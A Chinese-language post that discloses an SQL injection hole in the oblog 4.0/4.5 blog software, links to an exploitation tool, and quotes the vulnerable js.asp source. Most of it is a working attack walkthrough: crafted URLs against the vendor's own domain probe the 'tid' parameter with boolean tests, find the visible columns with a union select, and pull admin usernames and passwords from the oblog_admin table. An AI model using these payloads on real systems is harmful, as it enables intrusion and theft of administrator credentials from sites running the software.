这里还一个工具： oblog 4.0&4.5漏洞利用工具：http://www.7747.net/Soft/200704/6153.html 来源：Deepen Study Neeao:经测试漏洞确实存在，请广大使用此Blog的朋友们小心了！ 漏洞文件：js.asp<%Dim oblogset oblog=new class_sysoblog.autoupdate=Falseoblog.startdim js_blogurl,njs_blogurl=Trim(oblog.CacheConfig(3))n=CInt(Request(”n”))if n=0 then n=1select case CInt(Request(”j”))case 1call tongji()case 2call topuser()case 3call adduser()case 4call listclass()case 5call showusertype()case 6call listbestblog()case 7call showlogin()case 8call showplace()case 9call showphoto()case 10call showblogstars()Case 11Call show_hotblog()Case 12Call show_teams()Case 13Call show_posts()Case 14Call show_hottag()case 0call showlog()end select****************省略部分代码******************Sub show_posts()Dim teamid,postnum,l,u,tteamid=Request(”tid”)postnum=nl=CInt(Request(”l”))u=CInt(Request(”u”))t=CInt(Request(”t”))Dim rs,sql,sRet,sAddonSql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”If teamid<>“” And teamid<>“0″ Thenteamid=Replace(teamid,”|”,”,”)Sql=Sql & ” And teamid In (” & teamid & “) ”End IfSql=Sql & ” Order by postid Desc”Set rs=oblog.Execute(Sql)sRet=” ”Do While Not rs.EofsAddon=”"* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”If u=1 Then sAddon=rs(4)if t=1 ThenIf sAddon<>“” Then sAddon=sAddon & “,”sAddon=sAddon & rs(3)End IfIf sAddon<>“” Then sAddon=”(” & sAddon & “)”sRet=sRet & sAddon & “ ”rs.MovenextLoopSet rs = NothingsRet=sRet & “ ”Response.write oblog.htm2js (sRet,True)End Sub调用show_posts()过程必须要符合上面的参数n=1,j=13(” & teamid & “)http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常猜管理员表名http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1 Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ” http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1 document.write(’ * ‘); gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1